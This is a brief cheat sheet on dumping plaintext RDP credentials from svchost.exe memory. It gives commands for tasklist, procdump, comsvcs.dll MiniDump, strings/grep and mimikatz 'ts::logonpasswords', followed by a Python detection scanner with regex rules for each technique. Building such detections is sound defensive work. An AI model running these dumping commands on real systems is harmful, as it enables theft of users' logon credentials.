svchost.exe

Locate the svchost.exe process that holds the RDP credentials (the one with rdpcorets.dll loaded):

Cmd > tasklist /M:rdpcorets.dll

Use ProcDump or comsvcs.dll to dump the process memory:

Cmd > .\procdump64.exe -accepteula -64 -ma <PROCESS_PID> svchost.dmp
Cmd > rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PROCESS_PID> C:\Windows\Temp\svchost.dmp full

Grep the dump for plaintext passwords (strings -el extracts 16-bit little-endian strings, the encoding Windows uses internally):

$ strings -el svchost.dmp | grep <USERNAME> -C1

Mimikatz

Cmd > .\mimikatz.exe "privilege::debug" "token::elevate" "log out.txt" "ts::logonpasswords" "exit"
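From the defender's side, the same four command lines above are what process-creation telemetry will show. The following is an added example, not part of the original notes: a small Python scanner that turns each technique on this page into a regex rule and runs it over constructed Sysmon-style records (the Image and CommandLine field names and the PID 1234 are assumptions for the sample data).

```python
import re

# Constructed Sysmon Event ID 1-style records (Image + CommandLine); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\tasklist.exe",
     "CommandLine": "tasklist /M:rdpcorets.dll"},
    {"Image": r"C:\Tools\procdump64.exe",
     "CommandLine": "procdump64.exe -accepteula -64 -ma 1234 svchost.dmp"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 1234 C:\Windows\Temp\svchost.dmp full"},
    {"Image": r"C:\Tools\mimikatz.exe",
     "CommandLine": 'mimikatz.exe "privilege::debug" "token::elevate" "ts::logonpasswords" "exit"'},
    # Benign control record: the RDP host service itself starting, which must not fire.
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k NetworkService -s TermService"},
]

# One rule per technique on the page; every pattern matches case-insensitively on the command line.
RULES = [
    ("rdp_module_enum",    re.compile(r"tasklist\b.*/M:?\s*rdpcorets\.dll", re.I)),
    ("procdump_full_dump", re.compile(r"procdump(64)?(\.exe)?\b.*\s-ma\s+\S+", re.I)),
    ("comsvcs_minidump",   re.compile(r"rundll32(\.exe)?\b.*comsvcs\.dll,?\s*MiniDump\s+\S+", re.I)),
    ("mimikatz_ts_module", re.compile(r"ts::logonpasswords", re.I)),
]

def evaluate(event):
    """Return the names of every rule whose pattern matches this event's command line."""
    cmd = event.get("CommandLine", "")
    return [name for name, pattern in RULES if pattern.search(cmd)]

def scan(events):
    """Return (rule, Image) pairs so an analyst sees which binary triggered which rule."""
    return [(rule, ev.get("Image", "")) for ev in events for rule in evaluate(ev)]

if __name__ == "__main__":
    for rule, image in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {image}")
```

Because the matching is on command-line text, renamed binaries evade the procdump and mimikatz rules; pair these with an alert on any non-debugger process opening svchost.exe with PROCESS_VM_READ to cover that gap.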
